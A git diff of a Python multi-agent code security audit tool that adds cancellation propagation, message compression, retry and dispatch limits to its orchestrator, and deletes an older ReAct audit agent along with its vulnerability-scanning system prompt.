||||
"""Agent完成时调用"""
|
||||
self._state.set_completed(result)
|
||||
agent_registry.update_agent_status(self._agent_id, "completed", result)
|
||||
|
||||
# 向父Agent报告完成
|
||||
if self.parent_id:
|
||||
message_bus.send_completion_report(
|
||||
from_agent=self._agent_id,
|
||||
to_agent=self.parent_id,
|
||||
summary=result.get("summary", "Task completed"),
|
||||
findings=result.get("findings", []),
|
||||
success=True,
|
||||
)
|
||||
|
||||
def on_error(self, error: str) -> None:
|
||||
"""Agent出错时调用"""
|
||||
self._state.set_failed(error)
|
||||
agent_registry.update_agent_status(self._agent_id, "failed", {"error": error})
|
||||
|
||||
@abstractmethod
|
||||
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
|
||||
"""
|
||||
|
|
@ -296,6 +482,7 @@ class BaseAgent(ABC):
|
|||
def cancel(self):
|
||||
"""取消执行"""
|
||||
self._cancelled = True
|
||||
logger.info(f"[{self.name}] Cancel requested")
|
||||
|
||||
@property
|
||||
def is_cancelled(self) -> bool:
|
||||
|
|
@ -671,6 +858,35 @@ class BaseAgent(ABC):
|
|||
"tokens_used": self._total_tokens,
|
||||
}
|
||||
|
||||
# ============ Memory Compression ============
|
||||
|
||||
def compress_messages_if_needed(
|
||||
self,
|
||||
messages: List[Dict[str, str]],
|
||||
max_tokens: int = 100000,
|
||||
) -> List[Dict[str, str]]:
|
||||
"""
|
||||
如果消息历史过长,自动压缩
|
||||
|
||||
Args:
|
||||
messages: 消息列表
|
||||
max_tokens: 最大token数
|
||||
|
||||
Returns:
|
||||
压缩后的消息列表
|
||||
"""
|
||||
from ...llm.memory_compressor import MemoryCompressor
|
||||
|
||||
compressor = MemoryCompressor(max_total_tokens=max_tokens)
|
||||
|
||||
if compressor.should_compress(messages):
|
||||
logger.info(f"[{self.name}] Compressing conversation history...")
|
||||
compressed = compressor.compress_history(messages)
|
||||
logger.info(f"[{self.name}] Compressed {len(messages)} -> {len(compressed)} messages")
|
||||
return compressed
|
||||
|
||||
return messages
|
||||
|
||||
# ============ 统一的流式 LLM 调用 ============
|
||||
|
||||
async def stream_llm_call(
|
||||
|
|
@ -678,6 +894,7 @@ class BaseAgent(ABC):
|
|||
messages: List[Dict[str, str]],
|
||||
temperature: float = 0.1,
|
||||
max_tokens: int = 2048,
|
||||
auto_compress: bool = True,
|
||||
) -> Tuple[str, int]:
|
||||
"""
|
||||
统一的流式 LLM 调用方法
|
||||
|
|
@ -688,13 +905,23 @@ class BaseAgent(ABC):
|
|||
messages: 消息列表
|
||||
temperature: 温度
|
||||
max_tokens: 最大 token 数
|
||||
auto_compress: 是否自动压缩过长的消息历史
|
||||
|
||||
Returns:
|
||||
(完整响应内容, token数量)
|
||||
"""
|
||||
# 🔥 自动压缩过长的消息历史
|
||||
if auto_compress:
|
||||
messages = self.compress_messages_if_needed(messages)
|
||||
|
||||
accumulated = ""
|
||||
total_tokens = 0
|
||||
|
||||
# 🔥 在开始 LLM 调用前检查取消
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled before LLM call")
|
||||
return "", 0
|
||||
|
||||
await self.emit_thinking_start()
|
||||
|
||||
try:
|
||||
|
|
@ -705,6 +932,7 @@ class BaseAgent(ABC):
|
|||
):
|
||||
# 检查取消
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled during LLM streaming")
|
||||
break
|
||||
|
||||
if chunk["type"] == "token":
|
||||
|
|
@ -745,6 +973,10 @@ class BaseAgent(ABC):
|
|||
Returns:
|
||||
工具执行结果字符串
|
||||
"""
|
||||
# 🔥 在执行工具前检查取消
|
||||
if self.is_cancelled:
|
||||
return "任务已取消"
|
||||
|
||||
tool = self.tools.get(tool_name)
|
||||
|
||||
if not tool:
|
||||
|
|
|
|||
|
|
@ -79,7 +79,7 @@ Action Input: [JSON 参数]
|
|||
```
|
||||
|
||||
## 审计策略建议
|
||||
- 先用 recon Agent 了解项目全貌
|
||||
- 先用 recon Agent 了解项目全貌(只需调度一次)
|
||||
- 根据 recon 结果,让 analysis Agent 重点审计高风险区域
|
||||
- 发现可疑漏洞后,用 verification Agent 验证
|
||||
- 随时根据新发现调整策略,不要机械执行
|
||||
|
|
@ -90,6 +90,15 @@ Action Input: [JSON 参数]
|
|||
2. **动态调整** - 根据发现调整策略
|
||||
3. **主动决策** - 不要等待,主动推进
|
||||
4. **质量优先** - 宁可深入分析几个真实漏洞,不要浅尝辄止
|
||||
5. **避免重复** - 每个 Agent 通常只需要调度一次,如果结果不理想,尝试其他 Agent 或直接完成审计
|
||||
|
||||
## 处理子 Agent 结果
|
||||
- 子 Agent 返回的 Observation 包含它们的分析结果
|
||||
- 即使结果看起来不完整,也要基于已有信息继续推进
|
||||
- 不要反复调度同一个 Agent 期望得到不同结果
|
||||
- 如果 recon 完成后,应该调度 analysis 进行深度分析
|
||||
- 如果 analysis 完成后有发现,可以调度 verification 验证
|
||||
- 如果没有更多工作要做,使用 finish 结束审计
|
||||
|
||||
现在,基于项目信息开始你的审计工作!"""
|
||||
|
||||
|
|
@ -137,10 +146,31 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._steps: List[AgentStep] = []
|
||||
self._all_findings: List[Dict] = []
|
||||
|
||||
# 🔥 存储运行时上下文,用于传递给子 Agent
|
||||
self._runtime_context: Dict[str, Any] = {}
|
||||
|
||||
# 🔥 跟踪已调度的 Agent 任务,避免重复调度
|
||||
self._dispatched_tasks: Dict[str, int] = {} # agent_name -> dispatch_count
|
||||
|
||||
def register_sub_agent(self, name: str, agent: BaseAgent):
|
||||
"""注册子 Agent"""
|
||||
self.sub_agents[name] = agent
|
||||
|
||||
def cancel(self):
|
||||
"""
|
||||
取消执行 - 同时取消所有子 Agent
|
||||
|
||||
重写父类方法,确保取消信号传播到所有子 Agent
|
||||
"""
|
||||
self._cancelled = True
|
||||
logger.info(f"[{self.name}] Cancel requested, propagating to {len(self.sub_agents)} sub-agents")
|
||||
|
||||
# 🔥 传播取消信号到所有子 Agent
|
||||
for name, agent in self.sub_agents.items():
|
||||
if hasattr(agent, 'cancel'):
|
||||
agent.cancel()
|
||||
logger.info(f"[{self.name}] Cancelled sub-agent: {name}")
|
||||
|
||||
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
|
||||
"""
|
||||
执行编排任务 - LLM 全程参与!
|
||||
|
|
@ -149,6 +179,8 @@ class OrchestratorAgent(BaseAgent):
|
|||
input_data: {
|
||||
"project_info": 项目信息,
|
||||
"config": 审计配置,
|
||||
"project_root": 项目根目录,
|
||||
"task_id": 任务ID,
|
||||
}
|
||||
"""
|
||||
import time
|
||||
|
|
@ -157,6 +189,14 @@ class OrchestratorAgent(BaseAgent):
|
|||
project_info = input_data.get("project_info", {})
|
||||
config = input_data.get("config", {})
|
||||
|
||||
# 🔥 保存运行时上下文,用于传递给子 Agent
|
||||
self._runtime_context = {
|
||||
"project_info": project_info,
|
||||
"config": config,
|
||||
"project_root": input_data.get("project_root", project_info.get("root", ".")),
|
||||
"task_id": input_data.get("task_id"),
|
||||
}
|
||||
|
||||
# 构建初始消息
|
||||
initial_message = self._build_initial_message(project_info, config)
|
||||
|
||||
|
|
@ -169,6 +209,7 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._steps = []
|
||||
self._all_findings = []
|
||||
final_result = None
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("🧠 Orchestrator Agent 启动,LLM 开始自主编排决策...")
|
||||
|
||||
|
|
@ -189,7 +230,7 @@ class OrchestratorAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -197,11 +238,37 @@ class OrchestratorAgent(BaseAgent):
|
|||
|
||||
self._total_tokens += tokens_this_round
|
||||
|
||||
# 🔥 检测空响应
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止编排"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output Thought + Action + Action Input.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 的决策
|
||||
step = self._parse_llm_response(llm_output)
|
||||
|
||||
if not step:
|
||||
# LLM 输出格式不正确,提示重试
|
||||
format_retry_count = getattr(self, '_format_retry_count', 0) + 1
|
||||
self._format_retry_count = format_retry_count
|
||||
if format_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many format errors, stopping")
|
||||
error_message = "连续格式错误,停止编排"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
await self.emit_llm_decision("格式错误", "需要重新输出")
|
||||
self._conversation_history.append({
|
||||
"role": "assistant",
|
||||
|
|
@ -213,6 +280,9 @@ class OrchestratorAgent(BaseAgent):
|
|||
})
|
||||
continue
|
||||
|
||||
# 重置格式重试计数器
|
||||
self._format_retry_count = 0
|
||||
|
||||
self._steps.append(step)
|
||||
|
||||
# 🔥 发射 LLM 思考内容事件 - 展示编排决策的思考过程
|
||||
|
|
@ -249,6 +319,11 @@ class OrchestratorAgent(BaseAgent):
|
|||
observation = await self._dispatch_agent(step.action_input)
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 子 Agent 执行完成后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after sub-agent dispatch")
|
||||
break
|
||||
|
||||
# 🔥 发射观察事件
|
||||
await self.emit_llm_observation(observation)
|
||||
|
||||
|
|
@ -272,6 +347,60 @@ class OrchestratorAgent(BaseAgent):
|
|||
# 生成最终结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Orchestrator 已取消: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={
|
||||
"findings": self._all_findings,
|
||||
"steps": [
|
||||
{
|
||||
"thought": s.thought,
|
||||
"action": s.action,
|
||||
"action_input": s.action_input,
|
||||
"observation": s.observation[:500] if s.observation else None,
|
||||
}
|
||||
for s in self._steps
|
||||
],
|
||||
},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Orchestrator 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data={
|
||||
"findings": self._all_findings,
|
||||
"steps": [
|
||||
{
|
||||
"thought": s.thought,
|
||||
"action": s.action,
|
||||
"action_input": s.action_input,
|
||||
"observation": s.observation[:500] if s.observation else None,
|
||||
}
|
||||
for s in self._steps
|
||||
],
|
||||
},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🎯 Orchestrator 完成: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
|
||||
|
|
@ -377,6 +506,30 @@ class OrchestratorAgent(BaseAgent):
|
|||
available = list(self.sub_agents.keys())
|
||||
return f"错误: Agent '{agent_name}' 不存在。可用的 Agent: {available}"
|
||||
|
||||
# 🔥 检查是否重复调度同一个 Agent
|
||||
dispatch_count = self._dispatched_tasks.get(agent_name, 0)
|
||||
if dispatch_count >= 2:
|
||||
return f"""## ⚠️ 重复调度警告
|
||||
|
||||
你已经调度 {agent_name} Agent {dispatch_count} 次了。
|
||||
|
||||
如果之前的调度没有返回有用的结果,请考虑:
|
||||
1. 尝试调度其他 Agent(如 analysis 或 verification)
|
||||
2. 使用 finish 操作结束审计并汇总已有发现
|
||||
3. 提供更具体的任务描述
|
||||
|
||||
当前已收集的发现数量: {len(self._all_findings)}
|
||||
"""
|
||||
|
||||
self._dispatched_tasks[agent_name] = dispatch_count + 1
|
||||
|
||||
# 🔥 设置父 Agent ID 并注册到注册表(动态 Agent 树)
|
||||
logger.info(f"[Orchestrator] 准备调度 {agent_name} Agent, agent._registered={agent._registered}")
|
||||
agent.set_parent_id(self._agent_id)
|
||||
logger.info(f"[Orchestrator] 设置 parent_id 完成,准备注册 {agent_name}")
|
||||
agent._register_to_registry(task=task)
|
||||
logger.info(f"[Orchestrator] {agent_name} 注册完成,agent._registered={agent._registered}")
|
||||
|
||||
await self.emit_event(
|
||||
"dispatch",
|
||||
f"📤 调度 {agent_name} Agent: {task[:100]}...",
|
||||
|
|
@ -387,31 +540,92 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._tool_calls += 1
|
||||
|
||||
try:
|
||||
# 构建子 Agent 输入
|
||||
# 🔥 构建子 Agent 输入 - 传递完整的运行时上下文
|
||||
project_info = self._runtime_context.get("project_info", {}).copy()
|
||||
# 确保 project_info 包含 root 路径
|
||||
if "root" not in project_info:
|
||||
project_info["root"] = self._runtime_context.get("project_root", ".")
|
||||
|
||||
sub_input = {
|
||||
"task": task,
|
||||
"task_context": context,
|
||||
"project_info": {}, # 从上下文获取
|
||||
"config": {},
|
||||
"project_info": project_info,
|
||||
"config": self._runtime_context.get("config", {}),
|
||||
"project_root": self._runtime_context.get("project_root", "."),
|
||||
"previous_results": {
|
||||
"findings": self._all_findings, # 传递已收集的发现
|
||||
},
|
||||
}
|
||||
|
||||
# 🔥 执行子 Agent 前检查取消状态
|
||||
if self.is_cancelled:
|
||||
return f"## {agent_name} Agent 执行取消\n\n任务已被用户取消"
|
||||
|
||||
# 执行子 Agent
|
||||
result = await agent.run(sub_input)
|
||||
|
||||
# 收集发现
|
||||
# 🔥 执行后再次检查取消状态
|
||||
if self.is_cancelled:
|
||||
return f"## {agent_name} Agent 执行中断\n\n任务已被用户取消"
|
||||
|
||||
# 🔥 处理子 Agent 结果 - 不同 Agent 返回不同的数据结构
|
||||
if result.success and result.data:
|
||||
findings = result.data.get("findings", [])
|
||||
self._all_findings.extend(findings)
|
||||
data = result.data
|
||||
|
||||
# 🔥 收集发现 - 只收集格式正确的漏洞对象
|
||||
# findings 字段通常来自 Analysis/Verification Agent,是漏洞对象数组
|
||||
# initial_findings 来自 Recon Agent,可能是字符串数组(观察)或对象数组
|
||||
findings = data.get("findings", [])
|
||||
if findings:
|
||||
# 只添加字典格式的发现
|
||||
valid_findings = [f for f in findings if isinstance(f, dict)]
|
||||
self._all_findings.extend(valid_findings)
|
||||
|
||||
await self.emit_event(
|
||||
"dispatch_complete",
|
||||
f"✅ {agent_name} Agent 完成: {len(findings)} 个发现",
|
||||
f"✅ {agent_name} Agent 完成",
|
||||
agent=agent_name,
|
||||
findings_count=len(findings),
|
||||
)
|
||||
|
||||
# 构建观察结果
|
||||
observation = f"""## {agent_name} Agent 执行结果
|
||||
# 🔥 根据 Agent 类型构建不同的观察结果
|
||||
if agent_name == "recon":
|
||||
# Recon Agent 返回项目信息
|
||||
observation = f"""## Recon Agent 执行结果
|
||||
|
||||
**状态**: 成功
|
||||
**迭代次数**: {result.iterations}
|
||||
**耗时**: {result.duration_ms}ms
|
||||
|
||||
### 项目结构
|
||||
{json.dumps(data.get('project_structure', {}), ensure_ascii=False, indent=2)}
|
||||
|
||||
### 技术栈
|
||||
- 语言: {data.get('tech_stack', {}).get('languages', [])}
|
||||
- 框架: {data.get('tech_stack', {}).get('frameworks', [])}
|
||||
- 数据库: {data.get('tech_stack', {}).get('databases', [])}
|
||||
|
||||
### 入口点 ({len(data.get('entry_points', []))} 个)
|
||||
"""
|
||||
for i, ep in enumerate(data.get('entry_points', [])[:10]):
|
||||
if isinstance(ep, dict):
|
||||
observation += f"{i+1}. [{ep.get('type', 'unknown')}] {ep.get('file', '')}:{ep.get('line', '')}\n"
|
||||
|
||||
observation += f"""
|
||||
### 高风险区域
|
||||
{data.get('high_risk_areas', [])}
|
||||
|
||||
### 初步发现 ({len(data.get('initial_findings', []))} 个)
|
||||
"""
|
||||
for finding in data.get('initial_findings', [])[:5]:
|
||||
if isinstance(finding, str):
|
||||
observation += f"- {finding}\n"
|
||||
elif isinstance(finding, dict):
|
||||
observation += f"- {finding.get('title', finding)}\n"
|
||||
|
||||
else:
|
||||
# Analysis/Verification Agent 返回漏洞发现
|
||||
observation = f"""## {agent_name} Agent 执行结果
|
||||
|
||||
**状态**: 成功
|
||||
**发现数量**: {len(findings)}
|
||||
|
|
@ -420,22 +634,21 @@ class OrchestratorAgent(BaseAgent):
|
|||
|
||||
### 发现摘要
|
||||
"""
|
||||
for i, f in enumerate(findings[:10]): # 最多显示 10 个
|
||||
if not isinstance(f, dict):
|
||||
continue
|
||||
|
||||
observation += f"""
|
||||
for i, f in enumerate(findings[:10]):
|
||||
if not isinstance(f, dict):
|
||||
continue
|
||||
observation += f"""
|
||||
{i+1}. [{f.get('severity', 'unknown')}] {f.get('title', 'Unknown')}
|
||||
- 类型: {f.get('vulnerability_type', 'unknown')}
|
||||
- 文件: {f.get('file_path', 'unknown')}
|
||||
- 描述: {f.get('description', '')[:200]}...
|
||||
"""
|
||||
|
||||
if len(findings) > 10:
|
||||
observation += f"\n... 还有 {len(findings) - 10} 个发现"
|
||||
if len(findings) > 10:
|
||||
observation += f"\n... 还有 {len(findings) - 10} 个发现"
|
||||
|
||||
if result.data.get("summary"):
|
||||
observation += f"\n\n### Agent 总结\n{result.data['summary']}"
|
||||
if data.get("summary"):
|
||||
observation += f"\n\n### Agent 总结\n{data['summary']}"
|
||||
|
||||
return observation
|
||||
else:
|
||||
|
|
|
|||
|
|
@ -1,380 +0,0 @@
|
|||
"""
|
||||
真正的 ReAct Agent 实现
|
||||
LLM 是大脑,全程参与决策!
|
||||
|
||||
ReAct 循环:
|
||||
1. Thought: LLM 思考当前状态和下一步
|
||||
2. Action: LLM 决定调用哪个工具
|
||||
3. Observation: 执行工具,获取结果
|
||||
4. 重复直到 LLM 决定完成
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
from typing import List, Dict, Any, Optional, Tuple
|
||||
from dataclasses import dataclass
|
||||
|
||||
from .base import BaseAgent, AgentConfig, AgentResult, AgentType, AgentPattern
|
||||
from ..json_parser import AgentJsonParser
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
REACT_SYSTEM_PROMPT = """你是 DeepAudit 安全审计 Agent,一个专业的代码安全分析专家。
|
||||
|
||||
## 你的任务
|
||||
对目标项目进行全面的安全审计,发现潜在的安全漏洞。
|
||||
|
||||
## 你的工具
|
||||
{tools_description}
|
||||
|
||||
## 工作方式
|
||||
你需要通过 **思考-行动-观察** 循环来完成任务:
|
||||
|
||||
1. **Thought**: 分析当前情况,思考下一步应该做什么
|
||||
2. **Action**: 选择一个工具并执行
|
||||
3. **Observation**: 观察工具返回的结果
|
||||
4. 重复上述过程直到你认为审计完成
|
||||
|
||||
## 输出格式
|
||||
每一步必须严格按照以下格式输出:
|
||||
|
||||
```
|
||||
Thought: [你的思考过程,分析当前状态,决定下一步]
|
||||
Action: [工具名称]
|
||||
Action Input: [工具参数,JSON 格式]
|
||||
```
|
||||
|
||||
当你完成分析后,输出:
|
||||
```
|
||||
Thought: [总结分析结果]
|
||||
Final Answer: [JSON 格式的最终发现]
|
||||
```
|
||||
|
||||
## Final Answer 格式
|
||||
```json
|
||||
{{
|
||||
"findings": [
|
||||
{{
|
||||
"vulnerability_type": "sql_injection",
|
||||
"severity": "high",
|
||||
"title": "SQL 注入漏洞",
|
||||
"description": "详细描述",
|
||||
"file_path": "path/to/file.py",
|
||||
"line_start": 42,
|
||||
"code_snippet": "危险代码片段",
|
||||
"suggestion": "修复建议"
|
||||
}}
|
||||
],
|
||||
"summary": "审计总结"
|
||||
}}
|
||||
```
|
||||
|
||||
## 审计策略建议
|
||||
1. 先用 list_files 了解项目结构
|
||||
2. 识别关键文件(路由、控制器、数据库操作)
|
||||
3. 使用 search_code 搜索危险模式(eval, exec, query, innerHTML 等)
|
||||
4. 读取可疑文件进行深度分析
|
||||
5. 如果有 semgrep,用它进行全面扫描
|
||||
|
||||
## 重点关注的漏洞类型
|
||||
- SQL 注入 (query, execute, raw SQL)
|
||||
- XSS (innerHTML, document.write, v-html)
|
||||
- 命令注入 (exec, system, subprocess, child_process)
|
||||
- 路径遍历 (open, readFile, path concatenation)
|
||||
- SSRF (requests, fetch, http client)
|
||||
- 硬编码密钥 (password, secret, api_key, token)
|
||||
- 不安全的反序列化 (pickle, yaml.load, eval)
|
||||
|
||||
现在开始审计!"""
|
||||
|
||||
|
||||
@dataclass
|
||||
class AgentStep:
|
||||
"""Agent 执行步骤"""
|
||||
thought: str
|
||||
action: Optional[str] = None
|
||||
action_input: Optional[Dict] = None
|
||||
observation: Optional[str] = None
|
||||
is_final: bool = False
|
||||
final_answer: Optional[Dict] = None
|
||||
|
||||
|
||||
class ReActAgent(BaseAgent):
|
||||
"""
|
||||
真正的 ReAct Agent
|
||||
|
||||
LLM 全程参与决策,自主选择工具和分析策略
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
llm_service,
|
||||
tools: Dict[str, Any],
|
||||
event_emitter=None,
|
||||
agent_type: AgentType = AgentType.ANALYSIS,
|
||||
max_iterations: int = 30,
|
||||
):
|
||||
config = AgentConfig(
|
||||
name="ReActAgent",
|
||||
agent_type=agent_type,
|
||||
pattern=AgentPattern.REACT,
|
||||
max_iterations=max_iterations,
|
||||
system_prompt=REACT_SYSTEM_PROMPT,
|
||||
)
|
||||
super().__init__(config, llm_service, tools, event_emitter)
|
||||
|
||||
self._conversation_history: List[Dict[str, str]] = []
|
||||
self._steps: List[AgentStep] = []
|
||||
|
||||
def _get_tools_description(self) -> str:
|
||||
"""生成工具描述"""
|
||||
descriptions = []
|
||||
|
||||
for name, tool in self.tools.items():
|
||||
if name.startswith("_"):
|
||||
continue
|
||||
|
||||
desc = f"### {name}\n"
|
||||
desc += f"{tool.description}\n"
|
||||
|
||||
# 添加参数说明
|
||||
if hasattr(tool, 'args_schema') and tool.args_schema:
|
||||
schema = tool.args_schema.schema()
|
||||
properties = schema.get("properties", {})
|
||||
if properties:
|
||||
desc += "参数:\n"
|
||||
for param_name, param_info in properties.items():
|
||||
param_desc = param_info.get("description", "")
|
||||
param_type = param_info.get("type", "string")
|
||||
desc += f" - {param_name} ({param_type}): {param_desc}\n"
|
||||
|
||||
descriptions.append(desc)
|
||||
|
||||
return "\n".join(descriptions)
|
||||
|
||||
def _build_system_prompt(self, project_info: Dict, task_context: str = "") -> str:
|
||||
"""构建系统提示词"""
|
||||
tools_desc = self._get_tools_description()
|
||||
prompt = self.config.system_prompt.format(tools_description=tools_desc)
|
||||
|
||||
if project_info:
|
||||
prompt += f"\n\n## 项目信息\n"
|
||||
prompt += f"- 名称: {project_info.get('name', 'unknown')}\n"
|
||||
prompt += f"- 语言: {', '.join(project_info.get('languages', ['unknown']))}\n"
|
||||
prompt += f"- 文件数: {project_info.get('file_count', 'unknown')}\n"
|
||||
|
||||
if task_context:
|
||||
prompt += f"\n\n## 任务上下文\n{task_context}"
|
||||
|
||||
return prompt
|
||||
|
||||
def _parse_llm_response(self, response: str) -> AgentStep:
|
||||
"""解析 LLM 响应"""
|
||||
step = AgentStep(thought="")
|
||||
|
||||
# 提取 Thought
|
||||
thought_match = re.search(r'Thought:\s*(.*?)(?=Action:|Final Answer:|$)', response, re.DOTALL)
|
||||
if thought_match:
|
||||
step.thought = thought_match.group(1).strip()
|
||||
|
||||
# 检查是否是最终答案
|
||||
final_match = re.search(r'Final Answer:\s*(.*?)$', response, re.DOTALL)
|
||||
if final_match:
|
||||
step.is_final = True
|
||||
answer_text = final_match.group(1).strip()
|
||||
answer_text = re.sub(r'```json\s*', '', answer_text)
|
||||
answer_text = re.sub(r'```\s*', '', answer_text)
|
||||
# 使用增强的 JSON 解析器
|
||||
step.final_answer = AgentJsonParser.parse(
|
||||
answer_text,
|
||||
default={"raw_answer": answer_text}
|
||||
)
|
||||
# 确保 findings 格式正确
|
||||
if "findings" in step.final_answer:
|
||||
step.final_answer["findings"] = [
|
||||
f for f in step.final_answer["findings"]
|
||||
if isinstance(f, dict)
|
||||
]
|
||||
return step
|
||||
|
||||
# 提取 Action
|
||||
action_match = re.search(r'Action:\s*(\w+)', response)
|
||||
if action_match:
|
||||
step.action = action_match.group(1).strip()
|
||||
|
||||
# 提取 Action Input
|
||||
input_match = re.search(r'Action Input:\s*(.*?)(?=Thought:|Action:|Observation:|$)', response, re.DOTALL)
|
||||
if input_match:
|
||||
input_text = input_match.group(1).strip()
|
||||
input_text = re.sub(r'```json\s*', '', input_text)
|
||||
input_text = re.sub(r'```\s*', '', input_text)
|
||||
# 使用增强的 JSON 解析器
|
||||
step.action_input = AgentJsonParser.parse(
|
||||
input_text,
|
||||
default={"raw_input": input_text}
|
||||
)
|
||||
|
||||
return step
|
||||
|
||||
async def _execute_tool(self, tool_name: str, tool_input: Dict) -> str:
|
||||
"""执行工具"""
|
||||
tool = self.tools.get(tool_name)
|
||||
|
||||
if not tool:
|
||||
return f"错误: 工具 '{tool_name}' 不存在。可用工具: {list(self.tools.keys())}"
|
||||
|
||||
try:
|
||||
self._tool_calls += 1
|
||||
await self.emit_tool_call(tool_name, tool_input)
|
||||
|
||||
import time
|
||||
start = time.time()
|
||||
|
||||
result = await tool.execute(**tool_input)
|
||||
|
||||
duration_ms = int((time.time() - start) * 1000)
|
||||
await self.emit_tool_result(tool_name, str(result.data)[:200], duration_ms)
|
||||
|
||||
if result.success:
|
||||
# 截断过长的输出
|
||||
output = str(result.data)
|
||||
if len(output) > 4000:
|
||||
output = output[:4000] + "\n\n... [输出已截断,共 {} 字符]".format(len(str(result.data)))
|
||||
return output
|
||||
else:
|
||||
return f"工具执行失败: {result.error}"
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Tool execution error: {e}")
|
||||
return f"工具执行错误: {str(e)}"
|
||||
|
||||
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
|
||||
"""
|
||||
执行 ReAct Agent
|
||||
|
||||
LLM 全程参与,自主决策!
|
||||
"""
|
||||
import time
|
||||
start_time = time.time()
|
||||
|
||||
project_info = input_data.get("project_info", {})
|
||||
task_context = input_data.get("task_context", "")
|
||||
config = input_data.get("config", {})
|
||||
|
||||
# 构建系统提示词
|
||||
system_prompt = self._build_system_prompt(project_info, task_context)
|
||||
|
||||
# 初始化对话历史
|
||||
self._conversation_history = [
|
||||
{"role": "system", "content": system_prompt},
|
||||
{"role": "user", "content": "请开始对项目进行安全审计。首先了解项目结构,然后系统性地搜索和分析潜在的安全漏洞。"},
|
||||
]
|
||||
|
||||
self._steps = []
|
||||
all_findings = []
|
||||
|
||||
await self.emit_thinking("🤖 ReAct Agent 启动,LLM 开始自主分析...")
|
||||
|
||||
try:
|
||||
for iteration in range(self.config.max_iterations):
|
||||
if self.is_cancelled:
|
||||
break
|
||||
|
||||
self._iteration = iteration + 1
|
||||
|
||||
await self.emit_thinking(f"💭 第 {iteration + 1} 轮思考...")
|
||||
|
||||
# 🔥 调用 LLM 进行思考和决策
|
||||
response = await self.llm_service.chat_completion_raw(
|
||||
messages=self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
)
|
||||
|
||||
llm_output = response.get("content", "")
|
||||
self._total_tokens += response.get("usage", {}).get("total_tokens", 0)
|
||||
|
||||
# 发射思考事件
|
||||
await self.emit_event("thinking", f"LLM: {llm_output[:500]}...")
|
||||
|
||||
# 解析 LLM 响应
|
||||
step = self._parse_llm_response(llm_output)
|
||||
self._steps.append(step)
|
||||
|
||||
# 添加 LLM 响应到历史
|
||||
self._conversation_history.append({
|
||||
"role": "assistant",
|
||||
"content": llm_output,
|
||||
})
|
||||
|
||||
# 检查是否完成
|
||||
if step.is_final:
|
||||
await self.emit_thinking("✅ LLM 完成分析,生成最终报告")
|
||||
|
||||
if step.final_answer and "findings" in step.final_answer:
|
||||
all_findings = step.final_answer["findings"]
|
||||
break
|
||||
|
||||
# 执行工具
|
||||
if step.action:
|
||||
await self.emit_thinking(f"🔧 LLM 决定调用工具: {step.action}")
|
||||
|
||||
observation = await self._execute_tool(
|
||||
step.action,
|
||||
step.action_input or {}
|
||||
)
|
||||
|
||||
step.observation = observation
|
||||
|
||||
# 添加观察结果到历史
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": f"Observation: {observation}",
|
||||
})
|
||||
else:
|
||||
# LLM 没有选择工具,提示它继续
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "请继续分析,选择一个工具执行,或者如果分析完成,输出 Final Answer。",
|
||||
})
|
||||
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🎯 ReAct Agent 完成: {len(all_findings)} 个发现, {self._iteration} 轮迭代, {self._tool_calls} 次工具调用"
|
||||
)
|
||||
|
||||
return AgentResult(
|
||||
success=True,
|
